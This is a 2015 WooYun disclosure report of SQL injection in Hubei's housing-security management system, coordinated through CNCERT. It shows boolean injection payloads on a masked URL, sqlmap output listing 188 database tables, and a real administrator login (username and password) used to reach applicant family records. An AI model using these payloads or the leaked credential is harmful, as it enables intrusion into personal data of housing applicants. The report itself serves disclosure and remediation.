当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138638

漏洞标题:湖北省住房保障信息管理系统SQL注入(全省住房保障信息泄漏)

相关厂商:湖北省住房保障信息管理系统

漏洞作者: 小黑屋

提交时间:2015-09-06 13:41

修复时间:2015-10-23 08:54

公开时间:2015-10-23 08:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-06: 细节已通知厂商并且等待厂商处理中
2015-09-08: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-18: 细节向核心白帽子及相关领域专家公开
2015-09-28: 细节向普通白帽子公开
2015-10-08: 细节向实习白帽子公开
2015-10-23: 细节向公众公开

简要描述:

湖北省住房保障信息管理系统SQL注入,全省住房保障信息泄漏,3000多城乡镇信息管理员90%弱口令登陆。

详细说明:

湖北省住房保障信息管理系统
**.**.**.**:6080/

index.png


注入点地址:**.**.**.**:6080/WwPage/xmxxDetail.aspx?xmbh=4317
**.**.**.**:6080/WwPage/xmxxDetail.aspx?xmbh=4317' and '1'='1:

sql1.png


**.**.**.**:6080/WwPage/xmxxDetail.aspx?xmbh=4317' and '1'='2:

sql2.png


38个数据库:

database.png


当前数据库有188个表:

current-db-tables.png


3000多个城乡镇管理员表(90%弱口令):

user.png


……
用襄阳管理员: xygly 67896789 登陆系统:

houtai1.png


准入对象:

houtai2.png


申请家庭基本信息表:

houtai3.png


轮候库:

houtai4.png


漏洞证明:

---
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
Database: HBZFBZTEST
[188 tables]
+------------------------+
| AJGCCITY |
| AJGCNDJSJH |
| BBDY |
| BBTBB |
| BBYHZXWDGX |
| BSCYJB |
| BTJLB |
| BTSF |
| BTSFJL |
| BTYF |
| BZBZ |
| BZDXBZBZ |
| BZDXHTQY |
| BZDXNS |
| BZDXPJSX |
| BZDXSQTJ |
| BZDXSQTJGX |
| BZDXTJYB |
| BZDXXF |
| BZDXXYGL |
| BZDXZRDJBXX |
| BZGZXX |
| BZHSGHZB |
| BZHTMB |
| BZXM |
| BZXMPZFABZDXMX |
| BZXMTZ |
| BZXMTZSZMX |
| BZXMZYPZFA |
| BZZFGJDWDJSPXX |
| BZZFGJGRDJSPXX |
| BZZJBF |
| BZZJJSXX |
| BZZJZCXX |
| BZZJZCYSXX |
| DCBHDCZBXX |
| DCFA |
| DCZBK |
| DFPSQRGXB |
| DSZPOINT |
| DTGCXX |
| DTGCXX_PHQCQ |
| DWSJFXX |
| DXDCCYXX |
| DXDCJBXX |
| DXDCXX |
| DXDCZCXX |
| DXDCZFXX |
| DZDAXX |
| FILEDB |
| FWWXGL |
| FWZJSJ |
| FZBZ |
| FZZJ |
| GIS_MUTUALSTATE |
| GSQJJBXX |
| GSXX |
| HBAZXX |
| HD |
| HTHISTORY |
| HZB |
| HZDXBZFS |
| IMGTAB |
| JSXMAJXXB |
| JTCYQKB |
| JTCYXXBF |
| JTDAB |
| JTJBQKB |
| JTJBXXBF |
| JTZCXXBF |
| JTZFXXBF |
| KGJGSTATS |
| KHPJFAB |
| KHPJZBB |
| LHJFB |
| LHZBLB |
| LHZBXZ |
| LJCLC |
| LJCLCBF |
| LZFBTGS |
| LZFZLBTBZ |
| LZFZLBTBZXZ |
| MATERIAL_DIR_MXB_TABLE |
| MATERIAL_DIR_TABLE |
| MATERIAL_MUST_TABLE |
| MYGDFSKX |
| NBZSSFAXX |
| NDJHJSXMCB |
| NSGSXX |
| NSSHAJB |
| NSSHXX |
| PJHTDZDA |
| SCYJB |
| SHXX |
| SJTJ |
| SQJTCYXX |
| SQJTJBXX |
| SQJTZCXX |
| SQJTZFXX |
| SQRBTJE |
| SQRFWGXB |
| SXX |
| SYS_FOLDER |
| SYS_MENU |
| SYS_MENU_CONTROL |
| SYS_RESOURCE |
| SYS_ROLE |
| SYS_ROLE_CONTROL |
| SYS_ROLE_MENU |
| SYS_ROLE_USER |
| SYS_USER |
| TB_SYS_ADMIN |
| TB_SYS_CAPITAL |
| TB_SYS_CITY |
| TB_SYS_DISTRIBUTION |
| TB_SYS_PARAMCENTER |
| TB_SYS_ROLE |
| TB_SYS_SYSFILES |
| TB_SYS_SYSMENU |
| TB_SYS_USERINFO |
| TDCBXX |
| TDGYJLXX |
| TEST |
| TESTJR |
| TJBBHXWDZB |
| TJBBZDXX |
| TJBBZXWDZB |
| TJZBJHZ |
| TSCL |
| TSCLXX |
| WWSBXXB |
| WYFSD |
| WYFSJGL |
| WYGSXX |
| XMCQAZHTBA |
| XMCYDWXX |
| XMCYRYXX |
| XMDETAIL |
| XMGHCQAZXX |
| XMGHXX |
| XMJDCQAZXX |
| XMJDRZXX |
| XMJSGCSGHTBAXX |
| XMJSSPDZDA |
| XMJSSPZYZJXX |
| XMNDJHCQAZXX |
| XMNDJHXX |
| XMSTATS |
| XMXX |
| XMXXHISTORY |
| XMXX_PHQCQ |
| XZJGGZRYKHPJXX |
| XZJGGZRYXZJFJTB |
| YHKZHGL |
| YJDBYSZ |
| YPSFYTH |
| YPSFYZSS |
| YPZFYRZGL |
| YPZFYTTGL |
| YPZFYZJSS |
| YPZFYZJYS |
| ZCDXSQTJ |
| ZCDXXZJF |
| ZCDXZCBZ |
| ZCDXZCFS |
| ZCDXZJBFPZJH |
| ZCXM |
| ZCXMPZFAZCDXMX |
| ZCXMTZ |
| ZCXMTZSZMX |
| ZCXMZYPZFA |
| ZFBZDMB |
| ZFBZGHHGZB |
| ZFBZGZGFHKH |
| ZFBZGZGFHKHJGTBHBA |
| ZFBZNDJHZB |
| ZFJSGH |
| ZFNDJSJH |
| ZFXX |
| ZFXX_PHQCQ |
| ZLBTTCJL |
| ZRDJGZ |
| ZRDJGZXZ |
| ZRDJGZZB |
| ZRDJSHAJB |
| ZXJC |
| ZYPZFAMX |
| ZYSJBZZJFPXX |
+------------------------+

修复方案:

将攻击者可能用到的特殊字符以及敏感函数进行过滤或使用参数化查询

版权声明:转载请注明来源 小黑屋@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-08 08:53

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置

最新状态:

暂无


漏洞评价:

评论